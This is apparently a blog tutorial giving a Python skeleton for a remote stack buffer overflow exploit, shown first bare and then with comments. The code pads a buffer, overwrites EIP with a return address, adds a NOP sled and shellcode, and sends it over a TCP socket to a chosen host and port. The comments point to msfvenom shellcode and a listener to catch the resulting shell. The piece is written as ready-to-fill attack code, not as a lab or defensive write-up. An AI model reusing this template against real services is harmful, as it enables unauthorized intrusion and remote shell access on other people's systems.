Ok, this post is about how to quickly code an exploit (read: Stack buffer overflow) in your favorite language and mine, Python.
Wait, it's not your FAVORITE language? Seriously?
Well, that's ok, we can still be friends.
This code assumes a couple things, namely:
1) You know a thing or two about Python
2) You understand how TCP/IP works
3) You understand what sockets are
4) You understand stack overflows
5) You have certain information from fuzzing, such as the address of ESP/EIP
If none of this makes sense to you, then head on over to
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ and discover a new world of exploit development!
Anyway, this will give you a simple outline in Python on how to code an exploit quickly, once you have that certain information you need that I mentioned above. I'll outline it, and then explain what each piece does after that.
Let's begin!
Code (without comments/explanation):
#!/usr/bin/python
import socket
import sys
retaddress = "<return address here>"
shellcode = "<shellcode here>"
buffer = "A" * <number here> + retaddress + "\x90" * 16 + shellcode
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server = sys.argv[1]
port = sys.argv[2]
except IndexError:
print "[!] Usage: %s <host> <port>" % sys.argv[0]
sys.exit()
try:
sock.connect((server, port))
print repr(sock.recv(1024))
sock.send(buffer)
print repr(sock.recv(1024))
except:
print "[!] Connection refused. Something went wrong..."
sock.close()
-------------------------------------------
Code (with comments/explanation):
#!/usr/bin/python
# Import the "socket" library, necessary for any network functionality
# Import the "sys" library, necessary for accessing local system functionality
import socket
import sys
'''
"retaddress" is the return address where the shellcode will be located on the stack, i.e., ESP (Extended Stack Pointer)...
You're putting this address in at EIP (Extended Instruction Pointer).
In other words, you're overwriting EIP with the address you want the code to jump to.
Remember that Intel x86 is Little Endian, so write the address backwards. For example, if your return address is AABBCCDD, put the address below as "\xDD\xCC\xBB\xAA"
'''
retaddress = <put an address here>
'''
Shellcode goes here...if you're skilled enough to write your own, let's face it, you probably aren't reading this.
Use Metasploit's msfpayload/msfvenom to create shellcode, then make sure you have the appropriate listener setup to catch the shell, such as Metasploit's multi/handler or netcat/ncat.
'''
shellcode = <shellcode here>
'''
Setup the buffer that we'll send over the socket...
<number here> is the number of bytes that it takes to control EIP, then we put our shellcode after that...
Note that the NOP sled ("\x90" * 16) is optional, depending on how much room you have in the buffer...this will depend on the application
'''
buffer = "A" * <number here> + retaddress + "\x90" * 16 + shellcode
# Now we'll setup the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Make sure that the IP address and port number are put in
# If they aren't, then print the Usage, and exit
try:
server = sys.argv[1]
port = sys.argv[2]
except IndexError:
print "[!] Usage: %s <host> <port>" % sys.argv[0]
sys.exit()
# Open the socket, send the exploit, go from there
try:
sock.connect((server, port))
print repr(sock.recv(1024))
sock.send(buffer)
print repr(sock.recv(1024))
except:
print "[!] Connection refused. Something went wrong..."
# Should be obvious here, close the socket connection
sock.close()
I hope this helped anyone trying to quickly code an exploit in Python...if you have questions or concerns, leave them in the comments.
Night everyone!
- Aaron